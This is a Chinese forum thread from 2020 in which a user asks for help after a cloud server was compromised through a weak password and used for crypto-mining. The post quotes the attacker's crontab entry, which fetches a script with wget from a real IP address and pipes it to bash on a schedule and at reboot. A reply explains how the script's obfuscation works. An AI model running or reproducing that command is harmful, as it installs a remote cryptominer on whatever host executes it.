wmhx

腾讯云小主机被入侵部了一个挖矿程序

  •  
  •   wmhx · Jan 16, 2020 · 3404 views
    This topic created in 2325 days ago, the information mentioned may be changed or developed.

    好久没登录了, 今天发现很卡,就发现有个简单密码的用户的 crontab 被改了执行一个 msr 程序:

    crontab -l: */15 * * * * [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash @reboot [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash

    那个 test.sh 可以下载,没看懂内容, 只知道执行了一个 msr 的程序特别耗 CPU;

    没看出来这是啥东西. 谁帮忙给介绍下.

    3 replies    2020-01-19 02:19:50 +08:00
    opengps
        1
    opengps  
       Jan 16, 2020
    不知道是种什么脚本,不知道执行的程序是不是通过脚本下载的
    neighbads
        2
    neighbads  
       Jan 17, 2020   ❤️ 1
    前面就是一堆变量, 第二行 展开后是

    echo “$s 的 base64 编码” | rev |base64 -d

    然后得到的一堆再 eval、里面有 msr 的下载,写的乱糟糟

    yanheqi
        3
    yanheqi  
       Jan 19, 2020
    为什么会被入侵?密码太简单被破解?
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2748 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 65ms · UTC 09:50 · PVG 17:50 · LAX 02:50 · JFK 05:50
    ♥ Do have faith in what you're doing.